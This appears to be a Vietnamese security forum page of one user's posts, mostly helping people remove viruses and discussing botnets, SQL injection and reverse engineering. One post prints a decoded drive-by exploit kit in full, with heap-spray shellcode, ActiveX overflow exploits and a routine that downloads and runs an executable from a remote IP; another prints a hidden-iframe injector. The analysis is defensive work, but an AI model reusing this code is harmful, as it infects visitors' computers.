Messages posted by: bolzano_1989

Bạn có thể qua forum của CMC, thực hiện theo hướng dẫn sau để tìm trợ giúp diệt virus:

Hướng dẫn nhận trợ giúp diệt virus nhanh từ diễn đàn CMCLab Support
http://support.cmclab.net/vn/anti-virus-services/huong-dan-nhan-tro-giup-diet-virus-nhanh-tu-dien-dan-cmclab-support/

Nếu bạn gửi log ở HVA forum thì vui lòng gửi tin nhắn riêng cho mình là bạn đã gửi log ở HVA forum để mình kịp thời theo dõi smilie

.

Nhân chủ đề này, em có góp ý đến anh conmale:
Em thấy nếu user đăng nhập và profile đạt một số tiêu chí nào đó (về số post,...) thì nên được ưu tiên so với những người không đăng nhập vào diễn đàn mà chỉ duyệt web.
Thật tình là nhiều lúc Google để tìm kiếm kết quả từ diễn đàn, mở nhiều kết quả 1 chút là session đến HVA bị hủy, em phải chờ 1 thời gian mới được tạo session mới để truy cập.

Những gì tôi bảo bạn làm là để cung cấp thêm thông tin cho có người giúp được bạn thì bạn không làm, cứ la làng lên mà chẳng có tí thông tin gì hữu ích thì chẳng có ai giúp bạn nổi đâu.

Bạn đăng nhập vào tài khoản Gmail rồi vào trang sau, thêm trang web của bạn rồi thực hiện verify ownership để có thêm thông tin chi tiết về đường dẫn chứa malware/exploit của website của bạn lên diễn đàn để được tiếp tục giúp đỡ:

Webmaster Tools - Home
https://www.google.com/webmasters/tools/home?hl=en

Mình mới search thử, bạn tự kiểm tra mã nguồn và compile vậy:

http://www.megaupload.com/?d=SJ7NPZ8J
http://www.mediafire.com/?0aj1j2jaik20c2f

Có thể khi bị nhiễm virus, Internet Explorer bị thay đổi để truy cập Internet qua proxy thiết lập bởi virus. Khi virus bị diệt thì proxy đó không còn tác dụng nên truy cập Internet không được smilie

.

Làm sao bạn biết đó là virus?

Bạn nên xem lại cách trình bày của mình: câu cú không rõ ràng, không hình ảnh, không scan và gửi log. Ở các diễn đàn online thì cách đặt câu hỏi như vậy sẽ khó nhận được các câu trả lời tốt.

DanhNam wrote:

dấu hiệu của việc bị nhiễm virus hay keylog là gì hả các bạn?

Bạn có thể tham khảo bài viết sau của mình:
Một số hiện tượng đặc trưng biểu hiện máy tính bị lây nhiễm virus máy tính
http://support.cmclab.net/vn/index.php/topic,6597.0.html

whitesnow19 wrote:

Thật bất ngờ vì chỉ sau ít ngày, số lượng zombie trong mạng VNPT đã vươn tới con số 157. Tăng thứ hạng thêm 2 bậc chiếm vị trí thứ 3. Chẳng lẽ là đang có sự hình thành cuộc tấn công mới????

Xem chi tiết tại:

http://botnet-tracker.blogspot.com/2012/01/botnet-statistics-2012-01-04.html

Mọi người có thể theo dõi và bàn luận tại topic này thôi nhé.

Daily Botnet Statistics: My Botnet Detection System
http://botnet-tracker.blogspot.com/2009/10/my-botnet-detection-system_27.html

Tội phạm mạng đã và đang chuyển từ spam email sang spam ở các mạng xã hội. Hơn nữa, tần số gửi spam cũng có thể không ổn định tùy theo tội phạm mạng.
Phương pháp thống kê của tác giả dựa trên thống kê về email spam, mình e là những con số này khó dẫn đến kết luận đầy đủ về con số thực tế.

Kiến thức và kĩ năng sử dụng máy tính an toàn và bảo mật
http://support.cmclab.net/vn/tut0rial/kien-thuc-va-ki-nang-su-dung-may-tinh-an-toan-va-bao-mat/

saxvai wrote:

bolzano_1989 wrote:

saxvai wrote:

Mình thấy java , .net có hỗ trợ việc chống sql injection rất tốt. Do nó có cơ chế setParameter trong câu lệnh truy vấn, và loại bỏ ý nghĩa của các ký tự đặc biệt.
Còn php thì bạn cũng có thể viết một hàm để sử dụng nếu bạn lười. Còn nếu bạn siêng thì có thể tìm hiểu và sử dụng một vài framework có hỗ trợ sẵn . ^^

Java có những hỗ trợ gì sẵn có liên quan đến việc chống SQL Injection vậy bồ ?

PreparedStatement đó bồ

PreparedStatement dùng không phù hợp vẫn bị tấn công SQL Injection.

saxvai wrote:

Mình thấy java , .net có hỗ trợ việc chống sql injection rất tốt. Do nó có cơ chế setParameter trong câu lệnh truy vấn, và loại bỏ ý nghĩa của các ký tự đặc biệt.
Còn php thì bạn cũng có thể viết một hàm để sử dụng nếu bạn lười. Còn nếu bạn siêng thì có thể tìm hiểu và sử dụng một vài framework có hỗ trợ sẵn . ^^

Java có những hỗ trợ gì sẵn có liên quan đến việc chống SQL Injection vậy bồ smilie

?

namkaka wrote:

tôi nghĩ con số thống kê trên là chính xác ! VNPT xếp thứ 5 góp phần đưa VN xếp thứ 7 đây là thứ hạng khá cao phản ánh tình trạng bảo mật các máy tính ở VN còn rất yếu
nhưng cũng thật lạ vì tôi thấy các máy tính ở VN nếu không dùng PM bản quyền thì cũng dùng các phần mềm có tiếng như AVIRA, AVAST,MICROSOFT...... sao tỉ lệ nhiễm bot lại cao vậy ???

Dùng phần mềm bản quyền hay các phần mềm bảo mật có tiếng đâu có nghĩa là máy tính sẽ không bị nhiễm virus, trojan.
Ý thức bảo mật kém, người dùng không đủ khả năng nhận diện máy tính của mình bị nhiễm virus, lại quá tin vào các antivirus bom đạn, hệ quả trên là tất yếu.
Ngay cả các sandbox của các phần mềm Internet Security cũng có thể bị bypass, nếu bạn quan tâm thì có thể đăng ký tham dự hội thảo Tetcon 2012 để biết thêm chi tiết.

namkaka wrote:

bolzano_1989 wrote:

Trong chủ đề đó có đoạn JavaScript độc hại nên Avast cảnh báo.
Nếu bạn sợ thì đừng vào.

chả lẽ forum dính lỗi XSS ??? tôi vào chủ đề đó cũng bị AVAST chặn

Bạn hiểu thế nào là lỗi XSS?
Tại sao bạn cho rằng việc bị Avast chặn vào 1 trang trong website của HVA dẫn đến kết luận là diễn đàn có lỗi XSS? Mình thấy bạn chưa đưa ra đủ chứng cứ nào để khẳng định việc này cả.

Trong chủ đề đó có đoạn JavaScript độc hại nên Avast cảnh báo.
Nếu bạn sợ thì đừng vào.

acoustics89 wrote:

Bạn chủ topic nói đến XOR , làm mình nhớ đến đoạn code này
Code:
int a = 5;
int b = 7;
a ^= b ^= a ^= b;
hỏi sau đoạn code trên, a = ? và b = ?

a = a0
b = b0
a = a^b = a0^b0
b = b^a = b0^a0^b0
=> b = a0
a = a^b = (a0^b0)^a0
=> a = b0
Vậy a = 7 và b = 5.

TQN wrote:

a xor b có bằng b xor a không ?

a xor b = b xor a và a xor (b xor c) = (a xor b) xor c
nên thứ tự thực hiện các phép toán trên không quan trọng, đều dẫn đến cùng một kết quả.

Sau khi giải mã đoạn Javascript độc hại ở đầu chủ đề, mình ra được đoạn mã gốc sau, đoạn mã exploit được người viết virus này lấy từ MDAC Exploit Code:
Code:

var mm = new Array();
var mem_flag = 0;
function h()
{
mm=mm;
setTimeout("h()", 2000);
}
function getb(b, bSize)
{
while (b.length*2<bSize)
{
b += b;
}
b = b.substring(0,bSize/2);
return b;
}
function cf()
{
var zc = 0x0d0d0d0d;
var a = "䍃䍃࿫㍛曉肹老￬譿�擯齤䋳齤滧擯뤃憇܃ꩦ맫瞇攑ߡꩦ맧쪇ၟܭꩦ맣༡ޏꩦ맿⺇ખݗꩦ꿻흯騬昕뇯驦擋撶޹螿鿀砇曯⩤⽬暿쾪ႇ뿯ꩤ藻뛭멤߷ꫬ⣏돯솑⢊誗騐擏撶꼇藯럨ꫬ�밴Ⴜ쾚벿ꩤ藳뛪멤߷騐擏撶＇藯搐ﾪ撶껯붴໬໬໬໬ͬ뗫撼വ봘༐撺搃뉤맣鱤擓뤜饤�꘦䊮ⳬ�ｑᷕ℮꼝Ḅᇔ骱딊Ѥ땤褲撤㋬넪ⶲᬇထ먐ꎽꂢ瑨灴⼺㠯⸷〲⸷〱⸵㤱⼱楦敬瀮灨";
var heapBlockSize = 0x400000;
var pls = a.length * 2;
var bSize = heapBlockSize - (pls+0x38);
var b = "ఌఌ";
b = getb(b,bSize);
heapBlocks = (zc - 0x400000)/heapBlockSize;
for (i=0;i<heapBlocks;i++)
{
mm[i] = b + a;
}
mem_flag = 1;
h();
return mm;
}
function startWinZip(object)
{
var xh = 'A';
while (xh.length >< 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}
function startWVF()
{
for (i=0;i<128;i++)
{
try
{
var tar = new ActiveXObject('WebVi'+'ewFol'+'de'+'rIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
d = 0x7ffffffe;
b = 0x0c0c0c0c
tar.setSlice(d, b, b, b );
}
catch(e)
{
}
}
}
function elea()
{
var url="http://xa";
var outValue='';
for(i=0;i<url.length;)
{
outValue+='%u'+url.charCodeAt(i+1).toString(16)+url.charCodeAt(i).toString(16);
i=i+2;
}
x="邐邐邐㎐㏀帒륦ﺋ⺀耋श￩껫ᐔ愔델ᑄᐔ咍贐₄趯౬঍ᡮᑎᐔﯶ煬ᑲ气蚇潰Ũ贪ᑈᐔ贴滠攴樁?ᰘ畠螄壙᠜眲睼壚జ䔔擔敤摩樁贤滠攗樁Čၪ橣融赀䞈ᕼ樇認ᔴ䔇䯋꽓휕?숑㰤蠆파࿍?㴃蜡拹抍ᔸ竟ႍ赍⁢?ᢍᖍ귗孢ţā劒?ﳰʜ኎?藶Ṋ萱衬蒈ㄾ㰱㉉䑆㉉䑃㉇㭃ㅃ歺睰萲葬ᐔᐔᐔᐔᐔᐔᐔᐔ瑨灴⼺砯%uNaN61";
y="഍഍";
while(y.length><0x40000)y+=y;
y=y.substring(0,0x3ffe4-x.length);
o=new Array();
for(i=0;i<450;i++)o[i]=y+x;
z=Math.ceil(0xd0d0d0d);
document.write('<object classid="CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F"></object>');
z=document.scripts[0].createControlRange().length;
}
function yah()
{
try
{
document.write("<object classid='"+"clsid:9D39223E-AE8E-1"+"1D4-8FD3-00D0B77302"+"77' id='ta"+"rget'></"+"object>");
myBuff = '\x0a';
while (myBuff.length < 5000) myBuff += '\x0a\x0a\x0a\x0a';
eval(String.fromCharCode(116,97,114,103,101,116,46,115,101,114)+"ver = myBuff;");
eval("target"+"."+String.fromCharCode(114,101,99,101,105,118,101,40,41)+";");
}
catch(e)
{
return 0;
}
}
function startOverflow(num)
{
if (num == 0)
{
try
{
if (! mem_flag) cf();
yah();
elea();
var qt = new ActiveXObject('Quick'+'Time.Qu'+'ickTime');
if (qt)
{
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="qt.php">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) cf();
document.getElementById('myd'+'iv').innerHTML = qthtml;
num = 255;
}
}
catch(e)
{
}
if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);
}
else if (num == 1)
{
try
{
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE6"+"8F-B14D-43"+"ED-B713-BA413"+"F034904");
var ret=winzip.CreateNewFolderFromName(unescape("%00"));
if (ret == false)
{
if (! mem_flag) cf();
startWinZip(winzip);
num = 255;
}
}
catch(e)
{
}
if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);
}
else if (num == 2)
{
try
{
var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
if (tar)
{
if (! mem_flag) cf();
startWVF();
}
}
catch(e)
{
}
}
}
function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++)
{
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
function CreateObject(CLSID, name)
{
var r = null;
try
{
eval('r = CLSID.CreateObject(name)')
}
catch(e)
{
}
if (!r)
{
try
{
s=1;
eval('r = CLSID.CreateObject(name, "")')
}
catch(e)
{
}
}
if (!r)
{
try
{
s=1;
eval('r = CLSID.CreateObject(name, "", "")')
}
catch(e)
{
}
}
if (!r)
{
try
{
s=1;
eval('r = CLSID.GetObject("", name)')
}
catch(e)
{
}
}
if (!r)
{
try
{
s=1;
eval('r = CLSID.GetObject(name, "")')
}
catch(e)
{
}
}
if (!r)
{
try
{
s=1;
eval('r = CLSID.GetObject(name)')
}
catch(e)
{
}
}
return(r);
}
function XMLHttpDownload(xml, url)
{
try
{
xml.open("GET", url, false);
xml.send(null);
}
catch(e)
{
return 0;
}
return xml.responseBody;
}
function ADOBDStreamSave(o, name, data)
{
try
{
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
}
catch(e)
{
return 0;
}
return 1;
}
function ShellExecute(exec, name, type)
{
if (type == 0)
{
try
{
exec.Run(name, 0);
return 1;
}
catch(e)
{
}
}
else
{
try
{
exe.ShellExecute(name);
return 1;
}
catch(e)
{
}
}
return(0);
}
function MDAC()
{
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://87.207.105.191/file.php';
while (t[i] && (! v[0] || ! v[1] || ! v[2]) )
{
var a = null;
try
{
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
}
catch(e)
{
a = null;
}
if (a)
{
if (! v[0])
{
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
}
if (! v[1])
{
v[1] = CreateObject(a, "ADODB.Str"+"eam");
}
if (! v[2])
{
v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
if (! v[2])
{
v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
if (v[2]) n=1;
}
}
}
i++;
}
if (v[0] && v[1] && v[2])
{
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0)
{
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1)
{
if (ShellExecute(v[2], name, n) == 1)
{
ret=1;
}
}
}
}
return ret;
}
function start()
{
if (! MDAC() )
{
startOverflow(0);
}
}
start();

>

Sau khi giải mã đoạn Javascript độc hại trên, mình ra được đoạn mã gốc sau:
Code:

if (document.getElementsByTagName('body')[0])
{
iframer();
}
else
{
document.write("<iframe src='http://maseoi1l4f.c0m.li/i/fttpp27vecher' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer()
{
var f = document.createElement('iframe');
f.setAttribute('src','http://maseoi1l4f.c0m.li/i/fttpp27vecher');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

Nhiều khả năng bạn đã dùng một máy tính bị nhiễm virus và bị trộm password FTP của website.
Mọi giải pháp phục hồi hay sửa chữa của bạn sẽ vô dụng nếu bạn không thay đổi password FTP của bạn smilie

.

so61pi wrote:

- Trong trường hợp 1 hàm API được gọi nhiều lần thì làm sao để đặt breakpoint trên tất cả các lệnh call API đó.

Với IDA Pro, ở cửa sổ IDA View, bạn click chuột vào WINAPI function đó, gõ phím X sẽ xuất hiện danh sách các xrefs to WINAPI function đó rồi cứ thế mà lần lượt đặt các breakpoint thôi smilie

.

peter_nguyen1405 wrote:

Lý lẽ của bạn rất hay, rất vững chắc. Và cái cách bạn muốn dùng để chụp mũ mình không phải là tồi. Rất hay khi dùng đại số boolean, mạch tổ hợp, về mấy khoản này, mình thừa nhận là không bằng bạn.

Nhưng cá nhân mình vẫn giữ ý kiến ban đầu. Không phải vì mình hoặc bất cứ bạn nào có ý kiến như mình không muốn chia sẻ. Nhưng là chia sẻ rồi thì mọi việc sẽ dừng ở đấy. Điểm hay ở HVA mà mình học được so với các diễn đàn mà mình đã reg trước đây, chính là việc mình đọc 1 quyển sách bất kỳ và thắc mắc những điểm được nêu trong đó, chứ không phải là cứ lay hoay đi tìm mãi những quyển sách được giới thiệu là hay, tốt, được cho là tổng hợp từ cơ bản chưa biết gì tới pro biết hết.

Bạn muốn mình hoặc ai đó cho bạn 1 tựa sách. Nhưng cái nào tốt hơn nếu bạn đưa ra vấn đề mà bạn đang gặp phải, để mọi người cùng nhau mổ xẻ để học hỏi ? Sách vẫn chỉ là sách, và goole thì luôn có đó. Không ai cho cũng chẳng ai xin, bạn cần thì bạn phải tìm kiếm.

Gì vậy nè, đại số Boolean với mạch tổ hợp gì ở đây, bạn coi chừng học chưa xong đã bị tẩu hỏa đó smilie

.
Giới thiệu sách không đơn thuần chỉ là đưa tên sách smilie

.

Bạn đăng nhập vào tài khoản Gmail rồi vào trang sau, thêm trang web của bạn rồi thực hiện verify ownership để có thêm thông tin chi tiết về đường dẫn chứa malware/exploit của website của bạn lên diễn đàn để được tiếp tục giúp đỡ:

Webmaster Tools - Home
https://www.google.com/webmasters/tools/home?hl=en

Bạn có thể qua forum của CMC, thực hiện theo hướng dẫn sau để tìm trợ giúp diệt virus:

Hướng dẫn nhận trợ giúp diệt virus nhanh từ diễn đàn CMCLab Support
http://support.cmclab.net/vn/anti-virus-services/huong-dan-nhan-tro-giup-diet-virus-nhanh-tu-dien-dan-cmclab-support/

Nếu bạn gửi log ở HVA forum thì vui lòng gửi tin nhắn riêng cho mình là bạn đã gửi log ở HVA forum để mình kịp thời theo dõi.

tvv wrote:

kimchinh_no1 wrote:

BK có trừong phái của BK , Tự nhiên có trường phái của tự nhiên (Nói về so sánh more ... than thì cãi lộn đến tết năm nay là vừa )

Hì ! theo mình biết thì BK thuộc trượng phái Phần Cứng - Tự Nhiên thuộc trường phái Phần Mềm -- FPT thuộc truòng phái Mạng , nhận xét vậy không biết có đúng không ta .

Không đúng smilie

.

Bạn nên đọc kĩ lại hướng dẫn và thực hiện.

Bạn chưa hề gửi file log nào theo đúng hướng dẫn đã được nêu rõ cả.

Máy tính của bạn bị nhiễm virus rồi.

Bạn có thể qua forum của CMC, thực hiện theo hướng dẫn sau để tìm trợ giúp diệt virus:

Hướng dẫn nhận trợ giúp diệt virus nhanh từ diễn đàn CMCLab Support
http://support.cmclab.net/vn/anti-virus-services/huong-dan-nhan-tro-giup-diet-virus-nhanh-tu-dien-dan-cmclab-support/

Nếu bạn gửi log ở HVA forum thì vui lòng gửi tin nhắn riêng cho mình là bạn đã gửi log ở HVA forum để mình kịp thời theo dõi.

Bạn có thể qua forum của CMC, thực hiện theo hướng dẫn sau để tìm trợ giúp diệt virus:

Hướng dẫn nhận trợ giúp diệt virus nhanh từ diễn đàn CMCLab Support
http://support.cmclab.net/vn/anti-virus-services/huong-dan-nhan-tro-giup-diet-virus-nhanh-tu-dien-dan-cmclab-support/

Nếu bạn gửi log ở HVA forum thì vui lòng gửi tin nhắn riêng cho mình là bạn đã gửi log ở HVA forum để mình kịp thời theo dõi.